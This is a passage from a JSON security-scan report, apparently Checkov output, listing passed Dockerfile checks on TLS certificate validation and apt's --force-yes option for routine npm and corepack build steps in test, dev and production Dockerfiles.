"https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-node-tls-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_6", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "1d5fb0a211498b8baf37e5744578ad03459da7798534298981f23fdefb7eb757" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-node-tls-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_6", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "fb809e4860a3131df821aea9480445cc6e2f66dd52744dab5f3d2ef5b2848436" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-node-tls-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_6", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ENV", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "ENV NODE_ENV=test\n", + "value": "NODE_ENV=test", + "__startline__": 12, + "__endline__": 12 + }, + "label_": "resource: ENV", + "id_": "ENV", + "source_": "Dockerfile", + "content": "ENV NODE_ENV=test\n", + "value": "NODE_ENV=test", + "__startline__": 12, + "__endline__": 12, + "resource_type": "ENV", + "hash": "14d83a642c69d4cf67fcdbeb6dace7ba464024fdcad52f8129d63c78042457cb" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 13, + "ENV NODE_ENV=test\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 13, + 13 + ], + "resource": "/Dockerfile.test.ENV", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-node-tls-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_6", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "435bba968d1d0b4c410ea33851637829a16b2ad878f0b9531a737c7a444f91b9" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-node-tls-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_6", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "57abb1bbe03890ab19f47e5f96b9cbcee02aab65f6980d523df42faf41b709fa" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-node-tls-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_11", + "bc_check_id": null, + "check_name": "Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "dbd32b6bad6b728919787011f82d60c50d7b2d1c079f814de2b1640696c98816" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-force", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_11", + "bc_check_id": null, + "check_name": "Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20, + "resource_type": "RUN", + "hash": "6979b14e6a853ac150ffef85c5e28fd49c956054ea2cb1d01440e13b17260c4a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 21, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 21, + 21 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-force", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_11", + "bc_check_id": null, + "check_name": "Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21, + "resource_type": "RUN", + "hash": "c1f9cc0c42260bb0183d7e7b9ec2edab99837111ad42dbbdd7fad09ff3e37ab0" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 22, + "RUN npm run db:generate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 22, + 22 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-force", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_11", + "bc_check_id": null, + "check_name": "Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22, + "resource_type": "RUN", + "hash": "1bf185fb6038f1b491f2a2686de4dd9869ccdd9c3e34d2772cf43bd368377aa6" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 23, + "RUN npm run build\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 23, + 23 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-force", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_11", + "bc_check_id": null, + "check_name": "Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30, + "resource_type": "RUN", + "hash": "01c88e306f7db45ae7136e3bdb63c4b15978dd024f6ed18210961fc3db3df382" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 31, + 31 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-force", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_11", + "bc_check_id": null, + "check_name": "Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "1d5fb0a211498b8baf37e5744578ad03459da7798534298981f23fdefb7eb757" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-force", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_11", + "bc_check_id": null, + "check_name": "Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "fb809e4860a3131df821aea9480445cc6e2f66dd52744dab5f3d2ef5b2848436" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-force", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_11", + "bc_check_id": null, + "check_name": "Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "435bba968d1d0b4c410ea33851637829a16b2ad878f0b9531a737c7a444f91b9" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-force", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_11", + "bc_check_id": null, + "check_name": "Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "57abb1bbe03890ab19f47e5f96b9cbcee02aab65f6980d523df42faf41b709fa" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-force", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_3", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with wget", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "dbd32b6bad6b728919787011f82d60c50d7b2d1c079f814de2b1640696c98816" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-wget-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_3", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with wget", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20, + "resource_type": "RUN", + "hash": "6979b14e6a853ac150ffef85c5e28fd49c956054ea2cb1d01440e13b17260c4a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 21, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 21, + 21 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-wget-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_3", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with wget", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21, + "resource_type": "RUN", + "hash": "c1f9cc0c42260bb0183d7e7b9ec2edab99837111ad42dbbdd7fad09ff3e37ab0" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 22, + "RUN npm run db:generate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 22, + 22 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-wget-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_3", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with wget", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22, + "resource_type": "RUN", + "hash": "1bf185fb6038f1b491f2a2686de4dd9869ccdd9c3e34d2772cf43bd368377aa6" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 23, + "RUN npm run build\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 23, + 23 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-wget-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_3", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with wget", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30, + "resource_type": "RUN", + "hash": "01c88e306f7db45ae7136e3bdb63c4b15978dd024f6ed18210961fc3db3df382" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 31, + 31 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + 